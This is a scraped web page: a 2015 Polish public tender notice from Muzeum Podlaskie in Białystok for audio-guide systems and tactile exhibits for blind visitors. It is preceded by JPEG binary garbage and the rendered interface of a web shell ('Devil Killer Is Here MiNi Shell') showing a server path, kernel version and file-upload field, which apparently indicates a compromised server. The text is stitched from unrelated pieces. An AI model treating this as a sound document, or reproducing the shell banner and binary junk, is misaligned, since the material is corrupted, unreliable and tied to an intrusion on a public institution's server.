JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151013/271128-N-2015.html

<p class="kh_header"><b>Białystok: Dostawa systemu audioprzewodników wraz z jego wdrożeniem do 3 oddziałów Muzeum Podlaskiego w Białymstoku oraz dostawa wraz z montażem obiektów tyflograficznych do 8 oddziałów Muzeum Podlaskiego w Białymstoku</b><br>
<b>Numer ogłoszenia: 271128 - 2015; data zamieszczenia: 13.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podlaskie w Białymstoku , ul. Ratusz-Rynek Kościuszki 10, 15-426 Białystok, woj. podlaskie, tel. 085 7421473, 7421440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa systemu audioprzewodników wraz z jego wdrożeniem do 3 oddziałów Muzeum Podlaskiego w Białymstoku oraz dostawa wraz z montażem obiektów tyflograficznych do 8 oddziałów Muzeum Podlaskiego w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa systemu audioprzewodników wraz z jego wdrożeniem do 3 oddziałów Muzeum Podlaskiego w Białymstoku, tj.:
1)	Muzeum Podlaskie - siedziba główna Ratusz, Rynek Kościuszki 10, Białystok
2)	Muzeum Rzeźby A. Karnego - ul. Świętojańska 17, Białystok
3)	Muzeum w Tykocinie - ul. Kozia 2, Tykocin

Zamówienie obejmuje:

1)	ZAKUP I DOSTAWĘ SPRZĘTU
L.p.	SPRZĘT	ilość
1.	Urządzenie odsłuchowe wraz z akumulatorem	60 szt.
2.	Ładowarka do 10 urządzeń odsłuchowych	6 szt.
3.	Słuchawki	60 szt.
4.	Słuchawki dla osób niewidomych	40 szt.
5.	Znaczniki radiowe obiektów (ukrywane w ekspozycji)	55 szt.
6.	Znacznik na podczerwień do wyzwalania nagrań poprzez skierowanie audioprzewodnika na nadajnik	62 szt.
7.	Programator USB do wgrywania kontentu i komunikacji z urządzeniami odsłuchowymi	1 szt.
8.	Oprogramowanie statystyczne	1 szt.
Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku Nr 8 do SIWZ.


2)	OPRACOWANIE I NAGRANIE ŚCIEŻEK DŹWIĘKOWYCH

L.p.	OPIS	ilość
RATUSZ - AUDIODESKRYPCJA	
1.Koncepcja i opracowanie scenariusza audiodeskrypcji dla osób niewidomych na podstawie wizyty i konsultacji z Zamawiającym (z uwzględnieniem opisów do ok. 15 obrazów),  120 min.	2 szt.
2.Nagranie lektorskie, nieograniczona licencja,  120 min. 2 szt.
RATUSZ - AUDIOWYCIECZKA DLA DOROSŁYCH	
1.Koncepcja i opracowanie scenariusza do audiowycieczki dla dorosłych od 18 roku życia niewidomych na podstawie wizyty i konsultacji z Zamawiającym, język polski, 60 min.	1 szt.
2.Nagranie Lektorskie, język polski, nieograniczona licencja, 60 min.	1 szt.
3.Efekty dźwiękowe ( sztuka+montaż)	30 szt.
RATUSZ - ŚCIEŻKA DLA DOROSŁYCH - JĘZ. ANG.	
1.Koncepcja i opracowanie scenariusza do audiowycieczki dla odbiorcy angielskojęzycznego z uwzględnieniem ich specyfiki (inna wiedza ogólna), język angielski, do 60 min.	1 szt.
2.Nagranie Lektorskie, język angielski akcent brytyjski BBC English, klasa A, do 60 min.	1 szt.
3. Efekty dźwiękowe (montaż)	30 szt.
MUZEUM W TYKOCINIE - AUDIODESKRYPCJA	
1.Koncepcja i opracowanie scenariusza audiodeskrypcji dla osób niewidomych na podstawie wizyty i konsultacji z Zamawiającym (w tym: synagoga wraz z babińcem) 120 min.	2 szt.
2.Nagranie lektorskie, nieograniczona licencja, do 120 min.	 2 szt.
MUZEUM W TYKOCINIE - ŚCIEŻKA DLA DOROSŁYCH	
1.Koncepcja i opracowanie scenariusza do audiowycieczki dla dorosłych od 18 roku życia niewidomych na podstawie wizyty i konsultacji z Zamawiającym język polski, do 60 min.	1 szt.
2.Nagranie Lektorskie, język polski nieograniczona licencja, do 60 min.	1szt.
3.Efekty dźwiękowe (sztuka + montaż)	30 szt.
MUZEUM W TYKOCINIE - ŚCIEŻKA DLA DOROSŁYCH - JĘZ. ANG.	
1.Koncepcja i opracowanie scenariusza do audiowycieczki dla odbiorcy angielskojęzycznego z uwzględnieniem ich specyfiki (inna wiedza ogólna), język angielski, do 60 min.	1 szt.
2.Nagranie Lektorskie, język angielski akcent brytyjski BBC English, klasa A, do 60 min.	1 szt.
3.Efekty dźwiękowe (montaż)	30 szt.
MUZEUM RZEŹBY ALFONSA KARNEGO - AUDIODESKRYPCJA	
1.Koncepcja i opracowanie scenariusza audiodeskrypcji dla osób niewidomych na podstawie wizyty i konsultacji z Zamawiającym (w tym: przejście przez całość ekspozycji, audiodeskrypcja do max. 15 eksponatów), do 180 min.	3 szt.
2.Nagranie lektorskie, nieograniczona licencja, do 180 min.	3 szt.
MUZEUM RZEŹBY ALFONSA KARNEGO - ŚCIEŻKA DLA DOROSŁYCH	
1.Koncepcja i opracowanie scenariusza do audiowycieczki dla dorosłych od 18 roku życia niewidomych na podstawie wizyty i konsultacji z Zamawiającym, język polski, do 60 min.	1 szt.
2.Nagranie Lektorskie, język polski nieograniczona licencja, do 60 min.	1 szt.
3.Efekty dźwiękowe (sztuka + montaż)	30 szt.

3)Wykonawca zobowiązuje się do zainstalowania, uruchomienia, weryfikacji i adaptacji kontentu oraz do przeszkolenia obsługi z obsługi zakupionego sprzętu w w/w Oddziałach Zamawiającego
4)W ramach realizacji przedmiotu zamówienia i wynagrodzenia wynikającego z umowy Wykonawca zobowiązany będzie, pod rygorem zapłaty kary umownej,  do dokonania poprawek po pierwszym półroczu działania ekspozycji, zmian w scenariuszu, nagraniach lektorskich, wgrania na urządzenia, język polski, do 45 min.
5)Oferowany sprzęt ma być fabrycznie nowy, bez wad i umożliwiający działanie systemu, a Wykonawca udziela na dostarczony sprzęt min. 24 miesięcznej gwarancji na warunkach wynikających z umowy stanowiącej załącznik nr 7 do SIWZ.
6)System audioprzewodników winien działać w sposób automatyczny w zależności od miejsca, w którym znajduje się zwiedzający
7)Wykonawca zobowiązany jest przy podpisaniu protokołu, dostarczyć dokumentację w języku polskim, zawierającą instrukcję obsługi i konfiguracji audioprzewodników oraz dokument gwarancji na warunkach nie gorszych niż wynikające z umowy i SIWZ.
8)Wykonawca zobowiązany jest podczas opracowywania scenariuszy audiowycieczek  do konsultacji z Zamawiającym na każdym etapie prac.
9)Wykonawca zobowiązany jest do dostarczenia Zamawiającemu do korekty plików z materiałami dźwiękowymi przed ich instalacją w urządzeniach..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.35.30.00-2, 32.34.24.10-9, 79.53.00.00-8, 32.23.00.00-4, 22.11.43.00-5, 22.31.20.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w wysokości:
- I część przedmiotu zamówienia 5.000,00 zł (słownie: pięć tysięcy złotych).
- II część przedmiotu zamówienia 1.500,00 zł ( słownie: jeden tysiąc pięćset złotych).
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych, 
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
3.	Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego:
Bank Pekao A. A. O/ Białystok
04 1240 5211 1111 0000 4919 5527
4.	Wadium wnoszone w formie poręczeń lub gwarancji należy złożyć w formie oryginału w sekretariacie Muzeum Podlaskiego w Białymstoku, Ratusz Rynek Kościuszki 10, 15-426 Białystok. 
5.	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta (Poręczyciela). Gwarancja (poręczenie) musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta (Poręczyciela). Podpis powinien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji (poręczenia) powinno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta (Poręczyciela) do wypłaty Zamawiającemu pełnej kwoty wadium z tytułu wystąpienia zdarzeń określonych w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych. 
6.	W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (w konsorcjum), wadium to powinno obejmować zobowiązanie Gwaranta (Poręczyciela) z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich.
7.	Wadium musi być wniesione przed upływem terminu składania ofert.
8.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym 
w rozdziale XVIII pkt 2 terminie znajdzie się na rachunku bankowym Zamawiającego.
9.	Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>I część przedmiotu zamówienia: Zamawiający uzna warunek za spełniony, jeżeli wykonawca należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia przez niego działalności jest krótszy - w tym okresie minimum dwa zamówienia obejmujące wdrożenie bezprzewodowego systemu audioprzewodników na ekspozycje instytucji prowadzących działalność kulturalną lub/i turystyczną ( tj. muzea, galerie, obiekty sakralne, miasta) o wartości min. 150.000,00 zł brutto każde, w tym co najmniej jedno zamówienie obejmujące wdrożenie bezprzewodowego systemu audioprzewodników, gdzie wyzwalanie narracji jest automatyczne

II część przedmiotu zamówienia: Zamawiający uzna warunek za spełniony, jeżeli wykonawca należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia przez niego działalności jest krótszy - w tym okresie minimum dwa zamówienia obejmujące wykonanie co najmniej 2 obiektów tyflograficznych służących poznaniu rozmieszczenia pomieszczeń w budynku przez osoby niewidome i słabowidzące, o wartości min. 30.000,00 zł brutto w tym minimum jeden z opisem z alfabecie Brailla (może być ten sam obiekt) 

Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez wykonawców dokumenty i oświadczenie, o których mowa w Rozdziale VIII SIWZ na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>I część przedmiotu zamówienia:
Zamawiający uzna warunek za spełniony, jeżeli wykonawca:
- wykaże, że dysponuje lub będzie dysponować co najmniej jednym  tłumaczem, legitymującym się dyplomem ukończenia wyższych studiów filologicznych w zakresie języka angielskiego
- wykaże że dysponuje lub będzie dysponować co najmniej jednym lektorem native speakera języka angielskiego

Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu o przedłożone przez wykonawców dokumenty i oświadczenie, o których mowa w Rozdziale VIII SIWZ na zasadzie spełnia/nie spełnia.

II część przedmiotu zamówienia:
Zamawiający uzna warunek za spełniony, jeżeli wykonawca:
- wykaże, że dysponuje lub będzie dysponować co najmniej 1 osobą - tyflopedagogiem - osobą odpowiedzialną za jakość merytoryczną, dydaktyczną i informacyjną powstałych prac z co najmniej 3 letnim doświadczeniem zawodowym w obrębie tyflopedagogiki lub opracowywania i wykonywania obiektów tyflograficznych , która uczestniczyła przy przygotowaniu co najmniej jednego obiektu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia  o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę  w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust.1 Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony zgodnie z treścią i podpisany formularz Oferta, stanowiący Załącznik Nr 1 wraz z załącznikiem nr 1a bądź  nr 1b do oferty ( w zależności od części przedmiotu zamówienia) 
2)	Na potwierdzenie spełnienia wymagań minimalnych sprzętu wskazanego w załączniku nr 1a do oferty na część I przedmiotu zamówienia należy dołączyć dokumenty potwierdzające spełnienie minimalnych parametrów technicznych oferowanego sprzętu ( w języku polskim)
3)	Koncepcję, w której wykonawca zaproponuje sposób zaangażowania niewidomego konsultanta przy wykonaniu obiektów  tyflograficznych na każdym z etapów wykonywania obiektów. - dotyczy II części przedmiotu zamówienia
4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo udzielenia zamówienia na zmniejszoną, niż wskazane w SIWZ,  ilości poszczególnych składników zamówienia lub nie udzielenia zamówienia na niektóre składniki zamówienia wskazane w SIWZ  bez prawa żądania przez Wykonawcę wynagrodzenia umownego i kary umownej za niezrealizowaną część umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> przetargi.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Podlaskie w Białymstoku
Ratusz, Rynek Kościuszki 10
15-426 Białystok
Dział administracyjno - finansowy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2015 godzina 09:30, miejsce: Sekretariat  Muzeum Podlaskiego w Białymstoku
Ratusz - Rynek Kościuszki 10
15-426 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest planowany do zrealizowania w ramach zadania pn. Kultura bez barier w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007 - 2013 współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
